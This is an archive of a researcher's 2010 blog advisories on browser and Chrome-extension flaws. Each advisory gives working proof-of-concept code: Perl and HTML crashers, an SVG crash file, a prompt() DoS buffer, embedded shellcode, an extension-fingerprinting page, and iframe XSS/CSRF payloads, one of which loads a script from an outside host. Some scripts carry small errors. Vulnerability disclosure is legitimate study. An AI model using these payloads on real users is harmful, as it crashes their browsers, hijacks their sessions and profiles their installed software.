QTweb browser for windows 3.7(Build 063) CSS Denial of Service

Wednesday, December 08, 2010
#########################################################
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notify: NO exploit available: YES
##########################################################

QTweb browser for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.

The following are vulnerable:

QTweb for windows 3.7(Build 063)


###########
Sample PoC
###########

Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.

#########################################################################
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_QTweb.html";
my $junk= "A/" x 20000016;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_QTweb.html File Created successfully\n";
close($FILE);

############################# EOF ############################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for windows 5.0.2(7533.18.5) CSS Denial of Service

#########################################################
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
Vendor URL:http://www.Apple.com
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html
Vendor notify: NO exploit available: YES
##########################################################

Safari for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.

The following are vulnerable:

safari for windows 5.0.2(7533.18.5)


###########
Sample PoC
###########

Generate the Crash file and open it with safari,it hangs and arround one minut it crash
with a anormal program termination.

#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_safari.html";
my $junk= "A/" x 20000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_safari.html File Created successfully\n";
close($FILE);

############################# EOF ############################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Chrome Instaled extensions arbitrary detection

Tuesday, September 07, 2010
######################################################
Google Chrome Instaled extensions arbitrary detection
Vendor url: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify:YES vendor confirmed.YES exploit:YES
######################################################

Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Abstract
#########

How safe is use extensions ?
a attacker can access via iframe to resource extensions ( at this moment i
don´t have found a way to altered information from extensions).

like
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
for example...

a remote user can modify this web doc and call it with meta tag "base"
in a malformed doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
so i thnik that chrome-extension need sanitizacion to don´t access internal
resources from external web pages..( file:/// and other protocols handlers
are safe to use and don´t give access to internal resources from external
web docs...)

So chrome-extension protocol handler can be used to get extensions instaled
on client browser...and them if any extension is vulnerable to something
this information can be used for exploit this extension...

In incognito mode Extensions can be detectable too

###########################
A sample PoC of detection
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Timeline
##############

Discovered:27 may 2010
Vendor notify:01 jun 2010
Vendor patch:02 sep 2010
disclosure: 07 sep 2010

#######################€ND ########################

Thnx To Climbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for windows Invalid SGV text style Webkit.dll DoS

Monday, August 30, 2010
###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Vendor URL:www.apple.com
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Vendor notify :Yes exploit available :YES
###################################################

Safari browser for windows is prone vulnerable to a Denial of
service condition , this issue affects webkit.dll and cause a
crash when Safari try to render a SGV image with a very long
font size text style.



############
versions
############

Safari for windows 5.0.1 (7533.17.8)
on windows 7 ultimate fully patched.


Safari for windows windows 5.0.1 (7533.17.8)
on windows xp home sp3 fully patched


############
Timeline
############

Discovered:19-08-2010
vendor notofy:25-08-2010
Vendor response:26-08-2010
Disclosure: 30-09-2010

####################
Proof Of Concept
####################

Save This code as image.svg and open it with Safari,look
i have add some "extra" pixels in font size text style.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To Climbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Flock Browser 3.0.0.3989 Malformed Bookmark XSS

Thursday, August 19, 2010
#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notify:NO exploits availables:YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends.This browser version (3.0.0.3989) is based in a old
chromium project


Flock has a flaw that allows Cross-site scripting style attacks
In bookmarks is has a Malformed bookmark title persistent xss
when inport from other browsers a malformed bookmark or when add
a new malformed bookmark or import a bookmark html file.

###############################
Example Of Bookmark html file
###############################

<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
     It will be read and overwritten.
     DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">&quot;&gt;&lt;script src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'&gt;</A>
</DL><p>

#####################EOF##################

 It is a persintent script insercion and when the user click in the menu for view
favorites page or access directly to favorites url  this make a "defacement" of this page and them the user can´t access to favorites :)
( Url of favorites => chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

 ################# €nd #######################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Chrome and Chrome frame Prompt DoS

Monday, August 16, 2010
###############################################
Google Chrome and Chrome frame Prompt DoS
Vendor URL: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Advosore spanish:http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Vendor notify: YES exploit available:YES
###############################################

This Bug was discoveres by me and i have tested it
and investigate with Climbo From #ayuda-informaticos
on irc-hispano channel.

#########
abstract
#########

Some times the web aplications need to Prompt some data to users,
it can prompt via javascript code , or via html forms ...

In the case of javascript prompts what´s happend if
the data to prompt ( the question) is very long ?¿

################

Google chrome is prone vulnerable to a Denial of service
condition via "alert prompts" wen the data expected is very long ...

i don´t know if this can be turn in a remote code execution or
memory corruption with some heap spray or similar but i think
that this need to be analyze & patch


###################
Versions Tested
###################

In all cases chrome is the vector to do
something in all systems :)


######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)


####################
Proof Of Concepts
####################

this PoC is for testing in win7 32 bits, chrome
and chrome frame in conjuncion with ie8 that causes
a DoS in ie8

#############################
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################

This second PoC is for test in Linux or in Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>
################# EOF ###################

############
References
############
related vuln:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To Climbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for windows Long link DoS

Wednesday, August 04, 2010
############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################

Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

####################
Proof Of Concept
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

K-Meleon for windows about:neterror Stack Overflow DoS

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

########################
ASM code stack overflow
########################

################
#Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

IE8 On windows 7 32 bits unspecified DoS

Tuesday, July 13, 2010
##########################################
IE8 On windows 7 32 bits unspecified DoS
Vendor URL:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Vendor Notify:YES Vendor confirmed:YES
EXPLOIT:Private
###########################################

A posible flaw exits in Internet explorer 8
on windows 7 32-bits ,that can cause a remote
denial of service from a malformed web page.

This issue is tiggered when IE8 try to render
Modal app prompt in conjuncion with thirds appz that
uses recurses from IE8 and try to render text inputs
it is a posible GDI text-rendering
APIs bug or or DrawText() functions involved.

When the victim visit a malformed web page, an close the 2nd
appz, this appz turns unstable and needs to close , and then
when IE8 try to restore
the tab ,it los the focus from application and it results in
a denial of service to this window , because we can't click
in any bar , in any button or do some action in this window,
ie8 aparently is frozen.

After several test this issue only is reproducible in win7 32 bits

I have a exploit or PoC for this issue , but it's
private at this time :)

Solution:
Microsoft know that as a stability bug and they add it
for consideration in a future version to address it.

#################### €nd ##########################

Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Services Notifier Chrome extension XSS/CSRF

Friday, June 18, 2010
######################################
Google Services Notifier Chrome extension XSS/CSRF
extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html
Exploit available:yes vendor notify : NO
#######################################

So in this case "Notifier for Google Wave Chrome"
has a flaw that allow attackers to make XSS style attacks.

All extensions runs over his origin and no have way to altered data from extension
or get sensitive data like , email account or password etc..

if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
109 users have instaled it (WoW)

############
explanation
############

Google Services Notifier allows users to view wen they have a new wave and
view a preview of it ....

"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,
Google Docs, Google Wave etc. More services will be added soon."

If a attacker compose a new mail with html or javascript code in
subject & send it to victim´s the code is executed wen Victim´s click in the
extension to view a preview of mail.

So for exploit we need to compose a "special" mail
for example if we put directly in the mail subject a iframe like
"><iframe src="javascript:alert(location.href);"></iframe>
in the two cases the alert is executed wen try to preview the mail
with the extension :) it is executed in context location.href value is
"about:blank"

For example send a mail With a logout acction in google wave in body
"><iframe src="https://wave.google.com/wave/logout"></iframe>
it closes the sesion on google wave , this is a CSRF.

######################€nd#################################
.
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Notifier for Google Wave Chrome extension XSS/CSRF

######################################
Notifier for Google Wave Chrome extension XSS/CSRF
extension:https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb
advisore:http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html
Exploit available:yes vendor notify : NO
#######################################

So in this case "Notifier for Google Wave Chrome"
has a flaw that allow attackers to make XSS style attacks.

All extensions runs over his origin and no have way to altered data from extension
or get sensitive data like , email account or password etc..

if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb
56,542 users have instaled it (WoW)

############
explanation
############

Notifier for Google Wave allows users to view wen they have a new wave and
view a preview of it ....

If a attacker compose a new wave with html or javascript code in
body & send it to victim´s the code is executed wen Victim´s click in the
extension to view a preview of wave.

So for exploit we need to compose a "special" wave
for example if we put directly in the mail body a iframe like
"><iframe src="javascript:alert(location.href);"></iframe>
in the two cases the alert is executed wen try to preview the wave
with the extension :) it is executed in context location.href value is
"about:blank"

For example send a wave With a logout acction in google wave in body
"><iframe src="https://wave.google.com/wave/logout"></iframe>
it closes the sesion on google wave , this is a CSRF.

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Gmail Checker plus Chrome extension XSS/CSRF II

Thursday, June 17, 2010
######################################
Gmail Checker plus Chrome extension XSS/CSRF II
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html
Exploit available:yes vendor notify: NO
#######################################

So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)
has a flaw that allow attackers to make XSS style attacks.

All extensions runs over his origin and no have way to altered data from extension
or get sensitive data like , email account or password etc..

if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
303,711 users have instaled it (WoW)

############
explanation
############

Google Mail Checker Plus allows users to view wen they have a new mail and
view a preview of the mail ....

If a attacker compose a new mail with html or javascript code in mail
body & send it to victim´s the code is executed wen Victim´s click in the
extension to view a preview of mail.

So for exploit we need to compose a "special" mail
for example if we put directly in the mail body a iframe like
"><iframe src="javascript:alert(location.href);"></iframe>
the extension shows this code in plain text and the alert isn´t executed...
them we need to use a Feature from gmail ( auto conver links in clicable urls)
them we can compose a email body with a http link like
http://"><iframe src="javascript:alert(location.href);"></iframe>
or compose a mail link like :
lalala@"><iframe src="javascript:alert(location.href);"></iframe>.com
in the two cases the alert is executed wen try to preview the email
with the extension :) it is executed in context location.href value is
"about:blank"


Gmail is a safe place , but the extensions to manage it, can be a potential
vector to attack.

For example send a email With a logout acction in gmail in body
http://"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>
it closes the sesion on gmail , this is a CSRF.
also if the user has mark option to show notifications on desktop this issue execute the iframe too in the desktop notifications window and can cause to a denial of service of extension, for example if the victim´s try to change any option in options page from extension :P

So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401
The developer has release a patch version in trunk for other issues what i disclose before
see for references for previous vulns => OSVDB ID :65459 and OSVDB ID: 65460
previous patch =>
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js
and see diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

I release it as 0-day and no notify to vendor because
in the previous issues , he patch the vulns and don´t
make any reference to it and stealing credits on discover
Them i release this new vulns without notify developer :)


UPDATED :Now the extension in about secition reflects the vulnerability and credit it to me :)



######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Gmail Checker plus Chrome extension XSS

Thursday, June 03, 2010
######################################
Gmail Checker plus Chrome extension XSS
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
Exploit available:yes
#######################################

So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)
has a flaw that allow attackers to make XSS style attacks.

All extensions runs over his origin and no have way to altered data from extension or get sensitive data like , email account or password etc..

if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
303,711 users have instaled it (WoW)

############
explanation
############

Google Mail Checker Plus allows users to view wen they have a new mail and
view a preview of the mail ....

if a attacker compose a new mail with html or javascript code in subject form field and send it to victim´s the code is executed wen Victim´s click in the extension to view the mail and wen victim´s accept the alert and view a preview of mail the iframe is executed too.

Gmail is a safe place , but the extension to manage it can be a potential
vector to attack it.

For example send a email With a logout acction in gmail in subject
"><iframe src="https://mail.google.com/mail/?logout&hl=es"></iframe>
it closes the sesion on gmmail , this is a XSRF , and , in the case what you say aa
it is executed in context and the location.href value is "about:blank"

So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401
The developer has release a patch version in trunk =>
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js
please donload it and copy to your extension folder to solve it.

See Diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0

######################€nd#################################
.

Thnx for your time !!!

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion DoS

Friday, April 09, 2010
##################################
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion
error console DoS
Vendor URL:http://www.mozilla.com
vendor URL:http://www.flock.com/
Advisore:http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################

Firefox and Flock Browsers can hang with a malformed page,
and wen try to view error console firefox and flock crash
due to a uncaught excepcion and this is a out of memory
error.


################
Versions
################

firefox 3.6.2 and 3.6.3 vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228

Flock 2.5 vulnerable


#################
Proof of Concept
#################
<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!>
<!-- Shellcode calc.exe but does not work --!>
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
</head>
<body>
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3>

</center></body>
</html>



###################€nd ##########################

Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Flock browser marquee tag DoS

Thursday, April 01, 2010
############################################
Flock browser marquee tag DoS
advisore:http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html
############################################


Flock browser contains a flaw that may allow a remote denial of service.
The issue is triggered when an Victim visit a specially crafted web page
with a lot of marquee html tag and it will result in loss of availability
( DoS ) for Browser and posible memory corruption.

This bug was first discover by '599eme Man flouf@live.fr' and this
is a extended research about it, he was discovered in those browsers:
Opera 10.10
Firefox 3.5.7
Safari 4.0.4
SeaMonkey 2.0.1

and i test it in :

Flock Browser 1.2.6 vulnerable
Flock Browser 2.5 vulnerable

a sample code can be found/download here =>
http://www.exploit-db.com/exploits/11347

########################€nd ###################

Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Webmatic 3.0.3 Multiple cross.site scripting

Friday, March 19, 2010
#################################
Webmatic 3.0.3 Multiple cross.site scripting
Vendor URL:http://www.valarsoft.com/
Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html
Vendor notified: YES
#################################

Webmatic contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application
does not validate multiple variables and form fields upon
submission to the 'index.php' script. This could allow a
user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.


##############
Versions
##############

valarsoft webmatic 3.0.3

It´s posible that prior versions
are afected


################
TimeLIne
##############

Discovered 13-01-2010
Vendor notify: 14-03-2010
vendor response:15-03-2010
Disclosure: 19-03-2010

###############
Private messages
################

Subject field form is vulnerable

a attacker can compose a PM with a malformed title
and it is executed wen the victims view his inbox
or open the PM.


#################
Forums
#################

Search field form ,filer variable
and title form field affected.

a attacker can compose a post with a malformed title
